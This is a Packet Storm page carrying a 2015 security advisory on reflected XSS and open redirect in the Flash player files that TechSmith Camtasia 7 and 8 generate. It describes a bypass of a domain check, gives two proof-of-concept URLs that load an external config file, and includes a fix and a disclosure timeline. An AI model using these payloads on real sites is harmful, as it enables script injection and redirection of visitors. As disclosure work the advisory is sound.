exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

TechSmith Camtasia 7 / 8 Cross Site Scripting

TechSmith Camtasia 7 / 8 Cross Site Scripting
Posted Jan 14, 2015
Authored by Soroush Dalili

TechSmith Camtasia versions 7 and 8 suffer from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 0da3668d93c5d907fcfe6b8abc0ab9b5251abb5997b3d5d0d8042ce947378c29

TechSmith Camtasia 7 / 8 Cross Site Scripting

Change Mirror Download
Title: Reflected XSS in Flash files of TechSmith Camtasia 8 & 7
Author: Soroush Dalili (@irsdl)
Affected Software: TechSmith Camtasia v8.4.4 (latest 8.x) & v7.1.1 (latest
7.x)
Vendor URL: http://www.techsmith.com/camtasia-version-history.html
Vendor Status: vulnerable
CVE-ID: -

Camtasia 8 (v8.4.4 (latest 8.x) - vulnerable):
==============================================
TechSmith Camtasia is a screen recorder and video editor. After version 8,
it does not create SWF files that contain the video file. Instead, it
creates a MP4 file with HTML5 and SWF players.

However, SWF Player in version 8.4.3 (latest version at the time of
testing) was vulnerable to a reflected XSS attack.
After producing a Flash/HTML5 output, Camtasia creates the following flash
file:
ProjectName_controller.swf

This file is vulnerable to Open Redirect and XSS by loading a config file
that redirects the browser to an arbitrary destination after playing a
video. The destination URL can be attacker's URL (such as "//attacker.com/")
or a JavaScript that uses "javascript:" protocol.

The following shows a PoC code:
ProjectName_controller.swf?src=http://0me.me/demo/camtasia
/small.mp4&xmp=//0me.me/demo/camtasia/camtasia_v8.xml

This file can be found in any website that uses Camtasia projects for
instance techsmith.com website:
http://www.techsmith.com/includes/tsc_player.swf

Camtasia 7 (v7.1.1 (latest 7.x) - vulnerable):
==============================================
An XSS issue was resolved previously in generated Flash files of Camtasia 7
(http://web.appsec.ws/FlashExploitDatabase.php). TechSmith had patched this
vulnerability by implementing the "safeDomainCheck" function that checks
whether the domain is allowed or not in order to load the config file.
However, this protection can be bypassed by using "//" instead of "http://"
or "https://".

PoC code is as follows:
ProjectName_controller.swf?csConfigFile=//0me.me/demo/camtasia
/camtasia_v7.xml&.swf

Solution:
=========
Upgrade from Camtasia version 7 to 8. Use Camtasia HTML5 player instead of
the Flash player in Camtasia v8 and remove the old Flash files from
affected websites.

Disclosure Timeline:
====================
04-Nov-2014 – discovered
11-Nov-2014 – reported
14-Nov-2014 – initial acknowledge of receiving the issue from the vendor
17-Nov-2014 – the vendor confirmed that they know about these issues and
they do not have any ETA to patch the issue
18-Nov-2014 - the vendor confirmed that this issue can be publicly disclosed
07-Jan-2014 - the vendor also confirmed that this issue can be reported to
the security mail lists (double confirmation)!

Credit:
=======
Vulnerability found by Soroush Dalili (@irsdl)


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close